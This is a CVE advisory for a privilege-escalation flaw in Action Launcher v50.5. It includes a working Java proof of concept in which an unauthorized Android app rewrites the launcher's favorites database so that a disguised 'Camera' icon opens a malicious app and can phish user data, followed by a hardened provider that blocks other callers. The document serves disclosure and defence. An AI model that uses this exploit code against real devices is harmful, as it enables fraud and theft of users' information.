CVE-2022-47029: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue in Action Launcher v50.5 allows an attacker to escalate privileges via modification of the intent string passed to the update function.
Escalation of Privileges exists in Action Launcher (CVE-2022-47029)
Vendor: Action Launcher (https://actionlauncher.com/)
Affected product: Action Launcher (com.actionlauncher.playstore)
Version: 50.5
Download link: https://play.google.com/store/apps/details?id=com.actionlauncher.playstore&hl=en
Description of the vulnerability for use in the CVE: Action Launcher v50.5 allows unauthorized apps to tamper with the icons on the desktop and their corresponding apps, allowing attackers to defraud users by launching a fake UI.
Additional information: The favorites table in the exposed database stores the icon information presented on the screen, such as name, icon picture, and location coordinates. The intent string in the table is used to start the MainActivity of a target app. An unauthorized app can modify the intent data to defraud users by launching a fake UI and then steal user-sensitive information. In addition, attackers can directly manipulate the icon name, picture, and location coordinates on the desktop to replace the app that is started.
PoC:

```java
import android.content.ContentResolver;
import android.content.ContentValues;
import android.graphics.Bitmap;
import android.graphics.drawable.BitmapDrawable;
import android.graphics.drawable.Drawable;
import android.net.Uri;
import java.io.ByteArrayOutputStream;

// Method of an Activity in the unauthorized calling app.
public void attack_update_launcher() {
    // Fake a malicious app as Google Camera. When the user launches Google Camera, the malicious app is started.
    ContentResolver contentResolver = getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.actionlauncher.playstore.settings/favorites");
    ContentValues contentValues = new ContentValues();
    contentValues.put("title", "Camera");
    // Forge a malicious Intent to launch a malicious application
    contentValues.put("intent", "#Intent;action=android.intent.action.MAIN;category=android.intent.category.LAUNCHER;launchFlags=0x10200000;package=com.attack"
            + ";component=com.attack/com.attack.MainActivity;end");
    // The position (_id) of the Google Camera app in the Action Launcher database
    String[] s = {"5"};
    contentValues.put("screen", 0);
    contentValues.put("container", -101);
    contentValues.put("cellX", 4);
    contentValues.put("cellY", 0);
    contentValues.put("spanX", 1);
    contentValues.put("spanY", 1);
    contentValues.put("itemType", 0);
    contentValues.put("iconType", 1);
    contentValues.put("iconPackage", "com.actionlauncher.playstore");
    contentValues.put("iconResource", "com.actionlauncher.playstore:drawable/ic_allapps");
    // Must update the icon field with an icon identical to Google Camera's, or the Google Camera icon will change.
    Drawable drawable = getApplicationContext().getResources().getDrawable(R.drawable.attack);
    BitmapDrawable bd = (BitmapDrawable) drawable;
    Bitmap bitmap = bd.getBitmap();
    ByteArrayOutputStream os = new ByteArrayOutputStream();
    bitmap.compress(Bitmap.CompressFormat.PNG, 100, os);
    byte[] bytes = os.toByteArray();
    contentValues.put("icon", bytes);
    contentResolver.update(uri, contentValues, "_id=?", s);
}
```
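The update above succeeds because the provider accepts writes from any app. As an added example (not Action Launcher's code, and not part of the original advisory), a launcher-style provider can refuse every caller that does not share its own UID; the class name, database name and table schema are hypothetical. Declaring the `<provider>` with `android:exported="false"` in the manifest is the first line of defence, and the in-code check backs it up.

```java
import android.content.ContentProvider;
import android.content.ContentUris;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.net.Uri;
import android.os.Binder;
import android.os.Process;

// Hypothetical favorites provider; schema reduced to the columns the advisory names.
public class HardenedFavoritesProvider extends ContentProvider {
    private SQLiteOpenHelper helper;

    @Override public boolean onCreate() {
        helper = new SQLiteOpenHelper(getContext(), "launcher.db", null, 1) {
            @Override public void onCreate(SQLiteDatabase db) {
                db.execSQL("CREATE TABLE favorites (_id INTEGER PRIMARY KEY,"
                        + " title TEXT, intent TEXT, icon BLOB)");
            }
            @Override public void onUpgrade(SQLiteDatabase db, int from, int to) { }
        };
        return true;
    }

    // In-process calls report our own UID; any other app arrives over Binder with its UID.
    private void enforceLauncherOnly() {
        if (Binder.getCallingUid() != Process.myUid()) {
            throw new SecurityException("favorites: caller is not the launcher");
        }
    }

    @Override public int update(Uri uri, ContentValues v, String where, String[] args) {
        enforceLauncherOnly();
        return helper.getWritableDatabase().update("favorites", v, where, args);
    }
    @Override public Uri insert(Uri uri, ContentValues v) {
        enforceLauncherOnly();
        return ContentUris.withAppendedId(uri, helper.getWritableDatabase().insert("favorites", null, v));
    }
    @Override public int delete(Uri uri, String where, String[] args) {
        enforceLauncherOnly();
        return helper.getWritableDatabase().delete("favorites", where, args);
    }
    @Override public Cursor query(Uri uri, String[] cols, String where, String[] args, String sort) {
        enforceLauncherOnly();
        return helper.getReadableDatabase().query("favorites", cols, where, args, null, null, sort);
    }
    @Override public String getType(Uri uri) { return null; }
}
```

With this check in place, a `contentResolver.update(...)` call from another package fails with a `SecurityException` instead of rewriting the stored intent.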